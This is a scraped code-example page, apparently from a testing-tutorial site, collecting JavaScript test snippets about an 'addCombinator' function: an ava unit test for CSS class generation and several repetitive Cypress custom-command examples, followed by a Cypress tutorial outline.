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Source:add-combinator.test.mjs Github


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1import test from "ava"2import addClassName from "./​add-class-name.mjs"3import addCombinator from "./​add-combinator.mjs"4import store from "./​store.mjs"5test.serial (6 "given a string representing a combinator and declaration ",7 (t) => {8 const actual = addCombinator ("$parent>$child", { "color": "red" })9 const expect = {10 "id": ["$parent", undefined, ">", "$child", undefined],11 "key": ">color:red",12 "media": "",13 "rule": ".ae>.af{color:red}"14 }15 t.deepEqual (16 actual,17 expect,18 "return an object with 'id' and 'rule' properties"19 )20 }21)22test.serial (23 "given a string representing a combinator and reuse a className",24 (t) => {25 const actual = addCombinator ("$child $thing", { "color": "blue" })26 const expect = {27 "id": ["$child", undefined, " ", "$thing", undefined],28 "key": " color:blue",29 "media": "",30 "rule": ".af .ag{color:blue}"31 }32 t.deepEqual (33 actual,34 expect,35 "return an object with 'id' and 'rule' properties"36 )37 }38)39test.serial (40 "given a string representing a combinator and reusing both classNames",41 (t) => {42 const actual = addCombinator ("$parent+$thing", { "color": "green" })43 const expect = {44 "id": ["$parent", undefined, "+", "$thing", undefined],45 "key": "+color:green",46 "media": "",47 "rule": "{color:green}"48 }49 t.deepEqual (50 actual,51 expect,52 "return an object with 'id' and 'rule' properties"53 )54 }55)56test.serial (57 "given the function 'addClassName', when called with '$child', media query, and ':hover' (2)",58 (t) => {59 const actual = addClassName ("$stuff", "", ":hover")60 const expect = {61 "id": "ah",62 "key": ":hover$stuff",63 "media": "",64 "rule": undefined65 }66 t.deepEqual (actual, expect, "then should return the id string 'ah'")67 }68)69test.serial (70 "given a string representing a combinator and declaration",71 (t) => {72 const actual = addCombinator ("$parent>$stuff:hover", { "color": "red" }, "")73 const expect = {74 "id": ["$parent", undefined, ">", "$stuff", ":hover"],75 "key": ">:hovercolor:red",76 "media": "",77 "rule": ".ae>.ah:hover{color:red}"78 }79 t.deepEqual (80 actual,81 expect,82 "return an object with 'id' and 'rule' properties"83 )84 }...

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Using AI Code Generation


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1describe('My First Test Suite', function() 2{3 it('My FirstTest case',function() {4 cy.get('.search-keyword').type('ca')5 cy.wait(2000)6 cy.get('.products').as('productLocator')7 cy.get('@productLocator').find('.product').should('have.length',5)8 cy.get(':nth-child(3) > .product-action > button').click()9 cy.get('@productLocator').find('.product').should('have.length',4)10 cy.get(':nth-child(2) > .product-action > button').click()11 cy.get('@productLocator').find('.product').should('have.length',3)12 cy.get('@productLocator').find('.product').eq(2).contains('ADD TO CART').click().then(function()13 {14 console.log('sf')15 })16 cy.get('.brand').then(function(logoelement)17 {18 cy.log(logoelement.text())19 })20 cy.get('.brand').should('have.text','GREENKART')21 })22})

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Using AI Code Generation


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1Cypress.$('body').addCombinator('div', 'div', ':first-child');2jQuery('body').addCombinator('div', 'div', ':first-child');3$('body').addCombinator('div', 'div', ':first-child');4Cypress.$('body').addCombinator('div', 'div', ':first-child');5jQuery('body').addCombinator('div', 'div', ':first-child');6$('body').addCombinator('div', 'div', ':first-child');7Cypress.$('body').addCombinator('div', 'div', ':first-child');

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Using AI Code Generation


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1Cypress.Commands.add('getBySel', (selector, ...args) => {2 return cy.get(`[data-test=${selector}]`, ...args);3});4import { addMatchImageSnapshotCommand } from 'cypress-image-snapshot/​command';5addMatchImageSnapshotCommand();6describe('Commands', () => {7 it('should add custom commands to the Cypress command queue', () => {8 cy.getBySel('login-button').click();9 });10});11Cypress.Commands.add('getBySel', (selector, ...args) => {12 return cy.get(`[data-test=${selector}]`, ...args);13});14Cypress.Commands.add('login', () => {15 return cy.visit('/​').getBySel('login-button').click();16});17Cypress.Commands.add('login', () => {18 return cy.visit('/​').getBySel('login-button').click();19});20it('should add custom commands to the Cypress command queue', () => {21 cy.login();22});23Cypress.Commands.add('login', () => {24 return cy.visit('/​').getBySel('login-button').click();25});26it('should add custom commands to the Cypress command queue', () => {27 cy.login();28});29Cypress.Commands.add('login', () => {30 return cy.visit('/​').getBySel('login-button').click();31});32it('should add custom commands to the Cypress command queue', () => {33 cy.login();34});35Cypress.Commands.add('login', () => {36 return cy.visit('/​').getBySel('login-button').click();37});38it('should add custom commands to the Cypress command queue', () => {39 cy.login();40});41Cypress.Commands.add('login', () => {42 return cy.visit('/​').getBySel('login-button').click();43});44it('should add custom commands to the Cypress command queue', () => {45 cy.login();46});47Cypress.Commands.add('login', () => {48 return cy.visit('/​').getBySel('login-button').click();49});50it('should add custom commands to the Cypress command queue', () => {51 cy.login();52});53Cypress.Commands.add('login', () => {

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1Cypress.Commands.add('login', (username, password) => {2 cy.get('#username').type(username)3 cy.get('#password').type(password)4 cy.get('#login').click()5})6describe('Login', () => {7 it('should login', () => {8 cy.login('test', 'test')9 })10})

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1Cypress.Commands.add('addCombinator', (combinator) => {2 cy.get('.combinator-selector > .Select-control > .Select-input > input')3 .click()4 .type(combinator)5 .type('{enter}')6 .should('have.value', combinator);7});8Cypress.Commands.add('addSelector', (selector) => {9 cy.get('.selector-input > .Select-control > .Select-input > input')10 .click()11 .type(selector)12 .type('{enter}')13 .should('have.value', selector);14});15Cypress.Commands.add('addValue', (value) => {16 cy.get('.value-input > .Select-control > .Select-input > input')17 .click()18 .type(value)19 .type('{enter}')20 .should('have.value', value);21});22Cypress.Commands.add('addSelector', (selector) => {23 cy.get('.selector-input > .Select-control > .Select-input > input')24 .click()25 .type(selector)26 .type('{enter}')27 .should('have.value', selector);28});29Cypress.Commands.add('addValue', (value) => {30 cy.get('.value-input > .Select-control > .Select-input > input')31 .click()32 .type(value)33 .type('{enter}')34 .should('have.value', value);35});36Cypress.Commands.add('addSelector', (selector) => {37 cy.get('.selector-input > .Select-control > .Select-input > input')38 .click()39 .type(selector)40 .type('{enter}')41 .should('have.value', selector);42});43Cypress.Commands.add('addValue', (value) => {44 cy.get('.value-input > .Select-control > .Select-input > input')45 .click()46 .type(value)47 .type('{enter}')48 .should('have.value', value);49});

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1Cypress.SelectorPlayground.addCombinator('>>', {2 selector: (subject, combinator, selector) => {3 return subject.parent(selector);4 },5 filter: (subject, combinator, selector) => {6 return subject.filter(selector);7 }8});9cy.get('button>>.icon')

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1Cypress.Commands.add('addCombinator', (combinator) => {2 cy.get('[data-cy="combinator"]').click()3 cy.get(`[data-cy="${combinator}"]`).click()4})5Cypress.Commands.add('addCombinator', (combinator) => {6 cy.get('[data-cy="combinator"]').click()7 cy.get(`[data-cy="${combinator}"]`).click()8})9Cypress.Commands.add('addCombinator', (combinator) => {10 cy.get('[data-cy="combinator"]').click()11 cy.get(`[data-cy="${combinator}"]`).click()12})13Cypress.Commands.add('addCombinator', (combinator) => {14 cy.get('[data-cy="combinator"]').click()15 cy.get(`[data-cy="${combinator}"]`).click()16})17Cypress.Commands.add('addCombinator', (combinator) => {18 cy.get('[data-cy="combinator"]').click()19 cy.get(`[data-cy="${combinator}"]`).click()20})21Cypress.Commands.add('addCombinator', (combinator) => {22 cy.get('[data-cy="combinator"]').click()23 cy.get(`[data-cy="${combinator}"]`).click()24})

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Cypress Tutorial

Cypress is a renowned Javascript-based open-source, easy-to-use end-to-end testing framework primarily used for testing web applications. Cypress is a relatively new player in the automation testing space and has been gaining much traction lately, as evidenced by the number of Forks (2.7K) and Stars (42.1K) for the project. LambdaTest’s Cypress Tutorial covers step-by-step guides that will help you learn from the basics till you run automation tests on LambdaTest.


  1. What is Cypress? -
  2. Why Cypress? - Learn why Cypress might be a good choice for testing your web applications.
  3. Features of Cypress Testing - Learn about features that make Cypress a powerful and flexible tool for testing web applications.
  4. Cypress Drawbacks - Although Cypress has many strengths, it has a few limitations that you should be aware of.
  5. Cypress Architecture - Learn more about Cypress architecture and how it is designed to be run directly in the browser, i.e., it does not have any additional servers.
  6. Browsers Supported by Cypress - Cypress is built on top of the Electron browser, supporting all modern web browsers. Learn browsers that support Cypress.
  7. Selenium vs Cypress: A Detailed Comparison - Compare and explore some key differences in terms of their design and features.
  8. Cypress Learning: Best Practices - Take a deep dive into some of the best practices you should use to avoid anti-patterns in your automation tests.
  9. How To Run Cypress Tests on LambdaTest? - Set up a LambdaTest account, and now you are all set to learn how to run Cypress tests.


You can elevate your expertise with end-to-end testing using the Cypress automation framework and stay one step ahead in your career by earning a Cypress certification. Check out our Cypress 101 Certification.


Watch this 3 hours of complete tutorial to learn the basics of Cypress and various Cypress commands with the Cypress testing at LambdaTest.

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